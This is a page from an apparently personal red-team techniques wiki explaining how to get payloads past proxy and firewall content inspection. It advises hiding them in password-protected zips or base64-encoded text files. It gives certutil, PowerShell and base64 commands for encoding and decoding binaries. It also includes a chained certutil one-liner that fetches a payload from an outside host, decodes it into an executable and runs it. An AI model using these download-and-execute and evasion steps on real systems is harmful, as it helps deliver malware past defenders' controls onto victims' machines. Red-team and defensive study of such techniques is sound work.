Gibson> Download Garbage
  • Statement of purpose
  • Techniques
    • Intelligence Gathering
      • O365 Tenant ID
      • Internal domain enumeration
      • O365 email enumeration
      • Passive nmap (smap)
      • Large IP list handling
      • Host Enumeration
    • Initial Access
      • Mail scanning
      • VBA
    • Execution
      • DLL Hijacking
      • Windows LOLBINS
        • DLLs - LOLBIN Execution
        • Executables - LOLBIN Execution
        • Scripts - LOLBIN Execution
    • Privilege Escalation
      • Windows
        • Initial Enumeration
      • Linux
    • Defense Evasion
      • Clear windows event logs
      • Bypassing proxies and firewalls
      • Microsoft Windows Defender
    • Credential Access
      • Extract credentials from LSASS dump
      • Extract credentials from registry hives
      • LSA secrets extraction
      • Dumping LSASS.exe
      • Dumping registry hives
      • Dump the domain (Domain Controllers)
      • Browser cookies & passwords
      • Wi-Fi passwords
      • Clipboard
    • Infrastructure
    • Web application testing
      • XSS - Cross site scripting
        • Weaponising XSS
    • Other
      • Buffer Overflow resources
        • Buffer Overflow Python Template
        • Buffer Overflow Python Fuzzer
      • C Reverse Shell
      • Creating Tiered Storage in Windows 10
      • Default Credentials
    • Red Team Infrastructure
      • Cobalt Strike Team Server
      • Pre-redirector (free domains!)
      • HTTPS Redirector
      • Multi functional WebApp
      • Malleable C2 profiles
      • Gophish Docker reverse proxy
    • Malware
  • Tools
    • Tools
Powered by GitBook
On this page
  • As a zip
  • As text files

Was this helpful?

  1. Techniques
  2. Defense Evasion

Bypassing proxies and firewalls

Using encoding and chunking of files to avoid conent detection

Advanced proxies and firewalls can do SSL stripping and employ a variety of content inspection techniques. A well tuned defence could alert on or block the download of unusual file types such as executables or DLLs. In order to avoid this, payloads can be encoded or guised in a number of ways to appear as other file types.

As a zip

Zip files and passworded zip files can be used to hide files within if they are likely to be detected. Look for 7-zip or Win-Zip on the target system to be able to ustilise their encryption options.

I've had reasonable success in obfuscating second stage payloads downloaded by VBA by hiding them within a .zip.

As text files

By base64 encoding a binary, the content can be embeded within a larger text document or just moved into the environment "as is".

This can be completed in a number of ways:

Certutil 

#Encode binary
certutil -encode c:\zupdate.exe c:\zupdate.asc

#Decode binary
certutil -decode c:\zupdate.asc c:\zupdate.exe

#Chained decode after using certutil download functionality.
certutil.exe -urlcache -split -f "https://xenov.co.uk/payload.txt" payload.txt & certutil -decode payload.txt payload.exe & payload.exe

Powershell

$source = "C:\Tools\Malware\zupdate.exe"
$sourceb64 = "C:\Tools\Malware\zupdate.txt"
$sourcebrebuild = "C:\Tools\Malware\zupdate-rebuild.exe"

#Convert binary to b64 encoded string & write to text file
[IO.File]::WriteAllBytes($sourceb64,[char[]][Convert]::ToBase64String([IO.File]::ReadAllBytes($source)))

#read b64 from text file, decode & write to binary file
[IO.File]::WriteAllBytes($sourcebrebuild, [Convert]::FromBase64String([char[]][IO.File]::ReadAllBytes($sourceb64)))

Base64 (Linux & MacOS)

#Encode to Base64
base64 -i data.txt -o data.b64

#Decode a Base64 file
base64 -D -i data.b64 -o data.txt

PreviousClear windows event logsNextMicrosoft Windows Defender

Last updated 4 years ago

Was this helpful?